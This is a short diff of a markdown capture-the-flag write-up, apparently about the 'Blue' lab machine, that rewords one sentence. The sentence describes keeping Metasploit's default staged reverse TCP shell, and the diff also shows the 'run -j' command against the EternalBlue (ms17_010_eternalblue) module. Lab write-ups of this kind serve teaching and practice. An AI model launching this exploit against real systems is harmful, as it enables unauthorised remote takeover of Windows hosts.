PacketFire/packetfire_site/content/post/blue-boot2-root-writeup.md

    0   Windows 7 and Server 2008 R2 (x64) All Service Packs
 ```

-I left the default payload as the staged reverse TCP shell and decided to kick off an attack to see if I could get a shell.
+I left the default payload as the staged reverse TCP shell, and kicked off an attack to see if I could get a shell.

 ```
 msf5 exploit(windows/smb/ms17_010_eternalblue) > run -j